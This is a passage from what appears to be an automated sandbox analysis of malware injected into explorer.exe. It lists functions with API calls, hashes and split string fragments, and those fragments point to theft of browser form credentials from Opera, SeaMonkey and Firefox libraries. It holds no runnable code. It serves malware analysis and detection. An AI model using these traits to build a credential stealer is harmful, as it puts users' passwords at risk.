                                      Function 08898E12 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 447 8898e12-8898e38 448 8898e45-8898e6e NtProtectVirtualMemory 447->448 449 8898e40 call 8897942 447->449 450 8898e7d-8898e8f 448->450 451 8898e70-8898e7c 448->451 449->448
                                      APIs
                                      • NtProtectVirtualMemory.NTDLL ref: 08898E67
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2509035504.0000000008850000.00000040.80000000.00040000.00000000.sdmp, Offset: 08850000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_8850000_explorer.jbxd
                                      Similarity
                                      • API ID: MemoryProtectVirtual
                                      • String ID:
                                      • API String ID: 2706961497-0
                                      • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                      • Instruction ID: 49415fb8e3e8b895ddebc34f6f7b0a337b5d0119fd93aaf90b2e07ee61714ad9
                                      • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                      • Instruction Fuzzy Hash: 69015E34668B484F9B88EF6C948512AB7E4FBDA315F000B3EA99AC7254EB64D5414742
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 08898E0A Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 452 8898e0a-8898e6e call 8897942 NtProtectVirtualMemory 455 8898e7d-8898e8f 452->455 456 8898e70-8898e7c 452->456
                                      APIs
                                      • NtProtectVirtualMemory.NTDLL ref: 08898E67
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2509035504.0000000008850000.00000040.80000000.00040000.00000000.sdmp, Offset: 08850000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_8850000_explorer.jbxd
                                      Similarity
                                      • API ID: MemoryProtectVirtual
                                      • String ID:
                                      • API String ID: 2706961497-0
                                      • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                      • Instruction ID: 576049087e5a5be36991b722c006bb04f43bea874b1f450dfba8c14348b0177d
                                      • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                      • Instruction Fuzzy Hash: 3201A234628B884F8B48EF2C94512A6B3E5FBCE315F000B3EE9DAC3240DB25D5024782
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 088928C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • ObtainUserAgentString.URLMON ref: 088929A0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2509035504.0000000008850000.00000040.80000000.00040000.00000000.sdmp, Offset: 08850000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_8850000_explorer.jbxd
                                      Similarity
                                      • API ID: AgentObtainStringUser
                                      • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                      • API String ID: 2681117516-319646191
                                      • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                      • Instruction ID: caa9491b926a472078a0eb843618cf2a5857b0acbf5b99c91f730755c35a09df
                                      • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                      • Instruction Fuzzy Hash: 99319F31614A0D8ACF45EFA8C8847EDBBE1FB58215F44426AE49ED7240DE788645C78A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 088928BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • ObtainUserAgentString.URLMON ref: 088929A0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2509035504.0000000008850000.00000040.80000000.00040000.00000000.sdmp, Offset: 08850000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_8850000_explorer.jbxd
                                      Similarity
                                      • API ID: AgentObtainStringUser
                                      • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                      • API String ID: 2681117516-319646191
                                      • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                      • Instruction ID: 2e37c95adb2843d9fa022bbd315db5ff8501ce6d2756192bc333104d5bfe6d50
                                      • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                      • Instruction Fuzzy Hash: 6D21C130610A0C8ECF05EFA8C8947EDBBA0FF58205F44426EE49AD7340DF748605C78A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0888EB66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148synchronizationCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 232 888eb66-888eb68 233 888eb6a-888eb6b 232->233 234 888eb93-888ebb8 232->234 235 888eb6d-888eb71 233->235 236 888ebbe-888ec22 call 8895612 call 8897942 * 2 233->236 237 888ebbb-888ebbc 234->237 235->237 238 888eb73-888eb92 235->238 246 888ec28-888ec2b 236->246 247 888ecdc 236->247 237->236 238->234 246->247 249 888ec31-888ecd3 call 8899da4 call 8899022 call 88993e2 call 8899022 call 88993e2 CreateMutexW 246->249 248 888ecde-888ecf6 247->248 249->247 263 888ecd5-888ecda 249->263 263->248
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2509035504.0000000008850000.00000040.80000000.00040000.00000000.sdmp, Offset: 08850000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_8850000_explorer.jbxd
                                      Similarity
                                      • API ID: CreateMutex
                                      • String ID: .dll$el32$kern
                                      • API String ID: 1964310414-1222553051
                                      • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                      • Instruction ID: ca9d3b4d5d21637589b88c69602fa97db6042c54bdd876642e9a1273c73aae7c
                                      • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                      • Instruction Fuzzy Hash: B0414C74928A08CFDB54EFA8C8947AD77E1FB58301F04427AC84EDB255DA349945CB85
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0888EB72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138synchronizationCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2509035504.0000000008850000.00000040.80000000.00040000.00000000.sdmp, Offset: 08850000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_8850000_explorer.jbxd
                                      Similarity
                                      • API ID: CreateMutex
                                      • String ID: .dll$el32$kern
                                      • API String ID: 1964310414-1222553051
                                      • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                      • Instruction ID: 0f952b7cbc5d1c78e498555f817bd112085f7eda63fbf4b9eec0d1246131ea52
                                      • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                      • Instruction Fuzzy Hash: 50412C74A28A088FDF54EFA8C894BAD77E1FB58301F04417AC84EDB256DE349945CB85
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0889472E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 293 889472e-8894768 294 8894788-88947ab connect 293->294 295 889476a-8894782 call 8897942 293->295 295->294
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2509035504.0000000008850000.00000040.80000000.00040000.00000000.sdmp, Offset: 08850000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_8850000_explorer.jbxd
                                      Similarity
                                      • API ID: connect
                                      • String ID: conn$ect
                                      • API String ID: 1959786783-716201944
                                      • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                      • Instruction ID: cebe7768d91000cfc1c2eac395d9e014f1e084062a4d39edad683a450f8c43b6
                                      • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                      • Instruction Fuzzy Hash: 2F015E30618B1C8FCB84EF1CE088B55B7E0FB59315F1545AED94DCB226C674C8818BC2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 08894732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 298 8894732-8894768 299 8894788-88947ab connect 298->299 300 889476a-8894782 call 8897942 298->300 300->299
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2509035504.0000000008850000.00000040.80000000.00040000.00000000.sdmp, Offset: 08850000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_8850000_explorer.jbxd
                                      Similarity
                                      • API ID: connect
                                      • String ID: conn$ect
                                      • API String ID: 1959786783-716201944
                                      • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                      • Instruction ID: a60cb2fdcc1f573fcd5962d2a4ceebcff4ac34ab5d2b67aa95965783f8725798
                                      • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                      • Instruction Fuzzy Hash: 4C012C70618A1C8FCB84EF5CE088B55B7E0FB59315F1641AEA84DCB226CA74C9818BC2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 088946B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 411 88946b2-88946e5 412 8894705-889472d send 411->412 413 88946e7-88946ff call 8897942 411->413 413->412
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2509035504.0000000008850000.00000040.80000000.00040000.00000000.sdmp, Offset: 08850000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_8850000_explorer.jbxd
                                      Similarity
                                      • API ID: send
                                      • String ID: send
                                      • API String ID: 2809346765-2809346765
                                      • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                      • Instruction ID: af582b76d523a6c45940bab1b6475a1031670af52d59321cbb542e15bb9736ce
                                      • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                      • Instruction Fuzzy Hash: C4011270618A1C8FDB88EF1CD048B2577E0EB58315F1545AED85DCB266C670D8818B85
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 088945B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 416 88945b2-88945ea 417 889460a-889462b socket 416->417 418 88945ec-8894604 call 8897942 416->418 418->417
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2509035504.0000000008850000.00000040.80000000.00040000.00000000.sdmp, Offset: 08850000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_8850000_explorer.jbxd
                                      Similarity
                                      • API ID: socket
                                      • String ID: sock
                                      • API String ID: 98920635-2415254727
                                      • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                      • Instruction ID: 93b42a66b275dcb8b513946a2b7d105e1ce258986be5a2c8c925e23d58e0f019
                                      • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                      • Instruction Fuzzy Hash: 6D0121706186188FCB84EF1CD048B54BBE0FB59315F1545ADD45ECB266C7B4C9818B86
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0888C2DD Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 421 888c2dd-888c320 call 8897942 424 888c3fa-888c40e 421->424 425 888c326 421->425 426 888c328-888c339 SleepEx 425->426 426->426 427 888c33b-888c341 426->427 428 888c34b-888c352 427->428 429 888c343-888c349 427->429 431 888c370-888c376 428->431 432 888c354-888c35a 428->432 429->428 430 888c35c-888c36a call 8896f12 429->430 430->431 433 888c378-888c37e 431->433 434 888c3b7-888c3bd 431->434 432->430 432->431 433->434 436 888c380-888c38a 433->436 437 888c3bf-888c3cf call 888ce72 434->437 438 888c3d4-888c3db 434->438 436->434 440 888c38c-888c3b1 call 888d432 436->440 437->438 438->426 442 888c3e1-888c3f5 call 888c0f2 438->442 440->434 442->426
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2509035504.0000000008850000.00000040.80000000.00040000.00000000.sdmp, Offset: 08850000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_8850000_explorer.jbxd
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                      • Instruction ID: 79c267a6d9f6000781f1e3b6f5bae7bee04e169533619e1de527963039775ca6
                                      • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                      • Instruction Fuzzy Hash: AD317E74654B0ADFDBA4EF2980882A5B7A2FB55306F44427FC91DCB60AC7349052DFE2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0888C412 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 457 888c412-888c446 call 8897942 460 888c448-888c472 call 8899c9e CreateThread 457->460 461 888c473-888c47d 457->461
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2509035504.0000000008850000.00000040.80000000.00040000.00000000.sdmp, Offset: 08850000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_8850000_explorer.jbxd
                                      Similarity
                                      • API ID: CreateThread
                                      • String ID:
                                      • API String ID: 2422867632-0
                                      • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                      • Instruction ID: b1f73688902912c046b01cc5b713e0149ddfd71f9d8fa12ea98cafd8a0012bcf
                                      • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                      • Instruction Fuzzy Hash: 7FF0C234268A484FDB88EF2CD84563AB3D0EBA9215F44463EA58DC3264DA29C5814716
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Function 0E700D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                      • API String ID: 0-393284711
                                      • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                      • Instruction ID: 859e86565e1a2d85d091be55263ff0b59fd613ca3ed8b5dd3e85c790a6eb303f
                                      • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                      • Instruction Fuzzy Hash: 01E17E70518F488FC769EF68C498BAAB7E0FB98300F404A2E959FC7295DF30A901CB45
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0E703792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                      • API String ID: 0-2916316912
                                      • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                      • Instruction ID: 5076b6dec56c080448a9f5a1297190cf71e8f07fbc0bfc356f7428d4d8ca2eed
                                      • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                      • Instruction Fuzzy Hash: BDB15D30518B48CEDB55EF68C489AEEB7F1FF98300F50491ED49AC7261DF7099058B85
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0E701622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                      • API String ID: 0-1539916866
                                      • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                      • Instruction ID: fe2b579cf2b7e12c61c275d00c1dc26ef54e0ad755771095211472a9dd012662
                                      • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                      • Instruction Fuzzy Hash: 5341BE70A18B08CFDB14DF88A4596BEBBE2FB88700F40025ED809D3295DBB59D458BD6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0E708AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                      • API String ID: 0-355182820
                                      • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                      • Instruction ID: 7a52a537d13f6d0aaa341523c32ca3d2c38d3cba678da2aaeb68cc0d4de0140b
                                      • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                      • Instruction Fuzzy Hash: C9C16E70618B09CFC758EF64C499ADAF3E1FB98304F404B1E955AC7260DF70AA15CB86
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0E708F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                      • API String ID: 0-97273177
                                      • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                      • Instruction ID: 15a6c4ba4bb5072a10b95cd9a21ea550e4fc67709374f535b8c3b44284e1023b
                                      • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                      • Instruction Fuzzy Hash: 9451D230218748CFD719DF18D4852AAB7E5FBC4304F501A2EE99B87292DBB49906CB82
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0E7022F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                      • API String ID: 0-639201278
                                      • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                      • Instruction ID: 9c961d81d0c5243f15daf0b1e6e56f6c638fc0cdb086c0a652bf0e5bd21426bc
                                      • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                      • Instruction Fuzzy Hash: B6C1C371618A198FC758EF68D459AAAF3E1FB98310F40472D940EC72A5DF70EE01CB85
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0E7022F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                      • API String ID: 0-639201278
                                      • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                      • Instruction ID: 0d2a9d420e22d0abaedc31785244e0dba46e7783610c6ca286c9a96713bba51b
                                      • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                      • Instruction Fuzzy Hash: 0EC1C271618A198FC758EF68D459AEAF3E1FB98310F40472D940AC72A5DF70EE02CB85
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0E703CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: UR$2$L: $Pass$User$name$word
                                      • API String ID: 0-2058692283
                                      • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                      • Instruction ID: 8c3eeca474c2e0e43cd2f442808939733d43570578a5b5f24d957a582cb9a39f
                                      • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                      • Instruction Fuzzy Hash: 8BA18170618748CBDB29EF68D4447EEB7E1FB94300F404A2DE48AD7291EF709A458B85
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0E703CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: UR$2$L: $Pass$User$name$word
                                      • API String ID: 0-2058692283
                                      • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                      • Instruction ID: a04abe093f1a8460523e5cc2d09ec53923f682f74b66c6b1e42b4ae70054223b
                                      • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                      • Instruction Fuzzy Hash: D0915170618748CFDB29EFA8D444BEEB7E1FB98300F40462DE44AD7291EF749A458B85
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0E703352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $.$e$n$v
                                      • API String ID: 0-1849617553
                                      • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                      • Instruction ID: 6f63099db3e343678434857ac1e39aed4e1653c90cae0a0f41cb806d49508fbe
                                      • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                      • Instruction Fuzzy Hash: DB717031618B48CFD758EFA8D4886AAB7F1FF98304F000A2ED45AC7261EB71DD458B85
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0E6FEC32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 2.dl$dll$l32.$ole3$shel
                                      • API String ID: 0-1970020201
                                      • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                      • Instruction ID: dd30898425257bffa971261b8342b0fbb075baf63c3c745a17dcb6376201e20c
                                      • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                      • Instruction Fuzzy Hash: 05514CB0918B4C8FDB55EFA8C044AEEB7E1FF58301F404A2E959AE7254EF7095418B89
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0E6FF86F Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4$\$dll$ion.$vers
                                      • API String ID: 0-1610437797
                                      • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                      • Instruction ID: 3bf96906cd4bf11fc92d3ef484e037102a018820e63bd7b09ceb05dc53fca186
                                      • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                      • Instruction Fuzzy Hash: 1F416F30218B48CFCB65EF2498557EA73E4FF99301F45462E995EC7250EF30D9058B82
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0E7014B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 32.d$cli.$dll$sspi$user
                                      • API String ID: 0-327345718
                                      • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                      • Instruction ID: dbb4af2b39082c0c3c37a7edbaa38cb727a726dcd24b393f7a97b71339fcd5ca
                                      • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                      • Instruction Fuzzy Hash: C4415030A19E0DCFCB58EF5880997AD77E5FB58304F84456EA80ADB2A0DA70D940CB86
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0E6FF432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
